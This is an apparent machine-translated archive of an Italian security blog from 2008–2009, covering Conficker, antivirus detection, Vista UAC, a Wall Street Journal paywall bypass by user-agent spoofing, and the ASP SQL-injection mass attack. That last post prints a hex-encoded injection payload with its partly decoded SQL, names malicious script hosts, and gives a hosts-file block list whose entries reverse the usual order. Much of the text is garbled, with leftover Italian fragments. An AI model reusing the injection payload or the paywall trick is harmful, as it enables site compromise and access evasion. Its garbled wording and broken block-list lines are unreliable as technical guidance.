按分类存档'麻烦'
的undetect:是什么呢?
书面由亚历克斯7月14日,2009 - 10:03 AM
antivirusattuali基地的能力,捕捉病毒特征码识别(识别一个特定的病毒为一个典型的代码片段),但也多态病毒的频率(随机改变他们的代码的一部分),启发式技术,即识别恶意行为。
换句话说,一个程序,认识到您的FTP传输程序的网站的访问decodificandole密码可能会被标示为感染至少有一半可用的杀毒。 如果加密的exe国防和/或压缩,以确定威胁是显而易见的,通常有典型的话,可能是一个变种Win32.Hack“或类似的东西,。
在今天的病毒不喜欢他们曾经是,当他们说这是一种病毒,所以它是。
标签: 防病毒 , 在线扫描 , UnDetector , 病毒
发表于秘书 , 互联网 , 急切的 , 安全 | 没有评论»
Conficker的年4月1复出
书面亚历克斯4月15日-上午9:50
更新:要找出如果你被感染刚刚创建 OpenDNS的一个免费帐户,并输入。 旗帜会警告你,如果你的网络需要启动“可疑”,可以识别您的蠕虫感染。
让我们准备4月1日之日起的决定性/ Conficker的Downadup / Kido蠕虫在其第三个版本应该开始做一个新的尝试,破坏数以百万计的电脑。 看来,是严重的威胁,或至少像反病毒软件公司赛门铁克和CA给他信贷。
首先,要网站更新微软操作系统和下载安全补丁版本的操作系统(如Windows XP SP2中,微软页有关风险(微软MS08-067) 在这里 ,一个本地副本文件是在这里 )。
Conficker.C蠕虫已经阻止访问安全网站,如微软的更新和安全的主要软件公司的反恶意软件,包括CA,。 一旦感染您的电脑是影响其安全配置,修改注册表,删除和永久禁用的服务,这是“恢复系统配置”的重要点,为了防止受害人醒来到先前的系统感染。
然后,我们确保我们的防病毒更新,以防万一在这里有几个资源的识别和清除蠕虫。
以了解更多,或想了解更多这个网站 。
标签: 病毒
在发表于互联网 , 网页设计 , 坚持的 , 安全 | 无评论»
Downadup,它或Kido蠕虫-蠕虫病毒:Conficker的Vista中创建的问题
书面亚历克斯1月22日,2009 - 12:14
Conficker病毒带来了新的挑战,安全专家:可移动设备感染病毒欺骗用户,并安装该蠕虫。
Vista的自动启动,甚至新版本的Windows 7会自动搜索可移动磁盘上的程序。
然而,该病毒使用的文件AUTORUN.INF,篡改,变形使riconoscibileÂ不容易拦截这个过程和伪装成文件夹打开,使用社会工程技术,(见上图中):当点击选项,蠕虫自行安装。
从上面的图片中,我们看到有两个声音说,无论是“打开文件夹以查看文件”。
在现实中,大多数高是虚构的,当然是在出现的窗口中,当你插入一个可移动的设备中预置;找到更多的细节在这篇文章中的F-Secure。
对Conficker的有趣的文章,以及如何清除它是在这里 ,在bleepingcomputer.com 。
移除Conficker的工具是BitDefender的反Downadup工具 (你必须下载它从一台PC梨平方米或不感染,该蠕虫将停止您联系网站)。
标签: 病毒
发表于秘书 , 互联网 , 急切的 , 安全 | 没有评论»
免费阅读“华尔街日报”的文章
书面亚历克斯11月19日,2008 - 5:31下午 
在场的钥匙图标前面的华尔街日报文章暗示,这是只提供给用户。
梨平方米,如果您安装并激活扩展在Firefox的用户代理,它允许你带来Firefox浏览器,如果它是另一个浏览器(歌剧,IE浏览器,Safari浏览器等),并注册为一个新的代理通用黑莓,例如。 与此字符串:
BlackBerry8300/4.2.2Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107UP.Link/6.2.3.15.0
然后前面文章(http://online.wsj.com/article/SB122710109269040789.html说)下面的序幕:
http://mobile2.wsj.com/device/article.php?mid=&CALL_URL =
获得总:
然后你会看到手机的版本,这是免费的(现在和持续时间,只要你)甚至非用户。
为了推动这项工作,注册书签地址,进入“阅读”华尔街日报“文章”:
这是一个书签,纳米JavaScript应用程序,以当前地址(必须是在“禁区”,非用户一),序幕prepende说。
基本上,我们得到了一个假装是一个手机,然后读文章的免费版本。
标签: 阅读
在公布的秘书 , 互联网 , 好奇心 , 烦 | 没有评论»
altroconsumo:小心
书面亚历克斯11月13日,2008 - 12:33下午
多年订户Altroconsumo的烦恼和关注他们的习惯,注册提出一个公式,隐约压迫政府支付。
它是在邮政支付金额116.60欧元支付的认购,或获得25%的折扣和支付信用卡或借记卡的C / C银行或邮局之间的选择问题( RID),87.45欧元的总和。
奇怪的是,像Visa Electron卡,预付卡是不受欢迎的,“因为要爬,但他们可能会尝试。” 这显然不保证在即将到来的最后期限负责的偿付能力。
折扣官方的解释是,这种方法允许Altroconsumo,然后将它们保存快乐,扩大优势,向用户。 因此,这证明了认购办公室的做法,以更好地了解呼叫者。
美丽。
但很少信誉:是否获得通过C / C邮EUR 116.60将花费29.15欧元,直接和附带费用和组织,在意大利没有人会使用这种方法的集合。
换句话说Altroconsumo看作一个牧场上要绝对负责掌握他的听众:我们的存在,以资助他们,他们慷慨地将尽力保护我们的利益。
相反,消费者试图通过多年的虐待,现在的消费者主张欺诈和虚假广告的日常可疑的,由其他用户不解的报告证实:
选择的唯一真正的响应公民,叛军和决定,经过多年和多年的订阅(不仅也Altroconsumo Salutest和金钱和权利),这种态度是不值得说,在国防协会消费者来说,这也是完美的真诚。
其实协会本身的声誉造成损害,并怀疑是在破坏自己的信誉。 作为一个消费者,那些试图捍卫我,而不是有人再缴纳消费税,无法控制,只能回想起来抗议,如果我发现不必要的费用。
因此,告别Altroconsumo,谢谢你教我为自己辩护。
附录:是否继续向享受没有危险的感觉,Altroconsumo的正极,该解决方案是选择的RID的电荷,通过在首页银行往往是管理独立,和然后,当收到和检查,对负责“认购,停用的RID授权。 为每个订阅过期,你将接触Altroconsumo,无法充电,你有一个现实的机会,续订或取消订阅。
标签: 虐待 , 骚扰
在一般 , 急切的 14评论»
禁用Windows Vista的UAC
书面亚历克斯10月6日,2008 - 11:39 AM用户帐户控制(UAC)是一套新的基础设施技术,使更好的桌面管理,同时减少对系统的恶意软件的影响。 如果在Windows Vista中启用该功能,所有用户,包括管理员,与标准用户帐户登录。 管理员可以有选择地启动行政应用程序可以使用完全权限的帐户只在必要时。 当您的帐户的访问权限的用户,在realtè环境的标准用户帐户登录,但他们拥有完全权限,经批准后可以运行他们的应用程序。 默认情况下,当前版本的Windows配置为Administrators组的成员大多数用户帐户。 这是一个严重的安全风险,因为恶意软件生产商更能够得到完全控制连接系统。 Vista的UAC功能,分开管理标准用户权限和活动,大大降低了攻击的机会。
标签: Windows Vista的 UAC ,
一般 , 急切的 , 编程 | 没有评论»
受感染的网站,广告滋扰-一个DIY解决方案
书面由亚历克斯6月4日,2008 - 9:21这似乎是万如“SQL注入”攻击的网页恶意网站修改,使不知情的水手们的电脑上下载一个木马,恶意代码插入到网页在ASP(Active Server Pages的Microsoft平台的脚本语言)。
注入的代码进行加密,并由此开始:
声明%20%20NVARCHAR(4000),设置%20 = CAST(0A-4400450
043004C004100520045002000400054002000760061007200630068006
1007200280032003500350029002C00400043002000760061007200630
06800610072002800320035003500290020004400450043004C0041005
200450020005400610062006C0065005F0043007500720073006F00720
0200043005500520053004F005200200046004F0052002000730065006
C00650063007400200061002E006E0061006D0065002C0062002E006E0
061006D0065002000660072006F006D0020007300790073006F0062006
A006500630074007300200061002C0073007900730063006F006C00750
06D006E00730020006200200077006800650072006500200061002E006
90064003D0062002E0069006400200061006E006400200061002E00780
074007900700065003D00270075002700200061006E006400200028006
2002E00780074007900700065003D003900390020006F0072002000620
02E00780074007900700065003D003300350020006â€|
一旦解码这样的时装展示:
申报@ T VARCHAR(255)@ C VARCHAR(255)的DECLARE Table_Cursor
光标选择从sysobjects中1 syscolumns中b a.name b.name
其中a.id = b.id和a.xtype的= U(b.xtype b.xtype或= 99 = 35
或b
搜索与谷歌www.nihaorr1.com/1.js字符串,或www.adw95.com/b.js www.banner82.com/b.js的是成千上万的网站,分为两类:那些讲“感染,特别是ASP的编程论坛,和那些已经安装了木马。
该软件在JavaScript程序未加载的破坏现场,但它打开1飞行无形的框架,指向1远程站点,其中提到的例子以上三个浏览器:是后者,被下载到您的PC病毒本身的受害者。
一些安全漏洞,该病毒试图利用安装木马(这就是为什么它是一个好主意,启用自动更新的操作系统!)
MS06-014漏洞在微软数据访问组件(MDAC)的功能,可以允许执行代码
MS07-004矢量标记语言中的漏洞可能允许远程执行代码
MS07-018 Microsoft内容管理服务器中的漏洞可能允许远程执行代码
MS07-033 Internet Explorer的累积安全更新
MS07-055 Kodak图像查看器中的漏洞可能允许远程执行代码
) ed inserirvi un reindirizzamento sul proprio PC (localhost) che renda inoffensivi gli indirizzi dei siti malevoli, ad es. 除了清理他们的经理的网站,你能做些什么个人是打开记事本(Notepad.exe)你的hosts文件(位于C:\ WINDOWS \ SYSTEM32 \ DRIVERS \ ETC \主机 ),并插入一个重定向到您的PC(localhost)的呈现无害的恶意网站,如地址。 行:
www.nihaorr1.com 127.0.0.1
www.adw95.com 127.0.0.1
www.banner82.com 127.0.0.1
nmidahena.com 127.0.0.1
aspder.com 127.0.0.1
当然,那些有问题的网站将不会作为实现,目前已确定的。
足够的新网站正在木马所利用,并重新启动,所以最好的解决办法是使用一个很好的杀毒软件。
受感染的网站很多,很多意大利人:有机构网站(直辖市,省和组织),私人网站和电子商务。
立刻就会介意虽然这些相同的技术也可以用于其它用途,以防止不必要的广告窗口的外观,在网上冲浪,防止顽劣儿童,以达到被认为不适合,等网站。
在这里找到的域列表localhost的技术封锁。
(来源: 熊猫实验室和www.f-secure.com )
标签: 打扰 , 互联网 , SQL注入 , 病毒
在一般 , 急切的 评论»
